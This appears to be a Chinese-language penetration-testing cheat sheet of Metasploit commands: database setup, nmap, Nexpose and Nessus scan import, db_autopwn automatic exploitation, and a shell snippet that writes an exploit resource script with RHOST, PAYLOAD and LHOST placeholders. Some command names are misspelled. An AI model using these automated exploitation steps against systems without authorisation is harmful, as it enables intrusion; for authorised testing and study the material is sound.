1.连接数据并显示一些信息
db_connet username:password@ip address/database name
db_destroy 同上
db_import 文件名字
db_hosts -c address,svcs,vulns // 显示ip地址,服务器,漏洞数
db_vlns // 显示漏洞名字
2.nmap扫描
db_nmap -sS -nP ip address
db_nmap -h
3.nexpose在metasploit的使用
load nexpose // 加载nexpose插件
nexpose -h
nexpose_connect 用户名:密码@ip地址:端口号 认证字符
nexpose_scan ip地址
db_hosts -c address // 显示漏洞信息
4.nessus在metasploit的使用
load nessus
nessus_connect 用户名:密码@ip地址:端口号 认证字符
nessus_policy_list //显示策略列表
nessus_scan_new
nessus_scan_new 2 bridge_scan ip地址
nessus_scan_status //显示状态
nessus_report_list // 报告列表
nessus_report_get 报告名字 // 显示报告
db_hosts -c address,svcs,vlns
db_autopwn -e -t -r -x -p // 自动运行检测数据库中得到的漏洞
5.搜索漏洞
search mysql // 搜索mysql的漏洞
6.保存metasploit用过的命令到文件
makerc 路径/文件名字
自动审计,运行检测
7.脚本如下
echo use 漏洞名字 >autoexploit.rc
echo set RHOST IP地址 >> autoexploit.rc
echo set PAYLOAD shellcode名字 >> autoexploit.rc
echo set LHOST IP地址 >> autoexploit.rc
echo exploit >> autoexploit.rc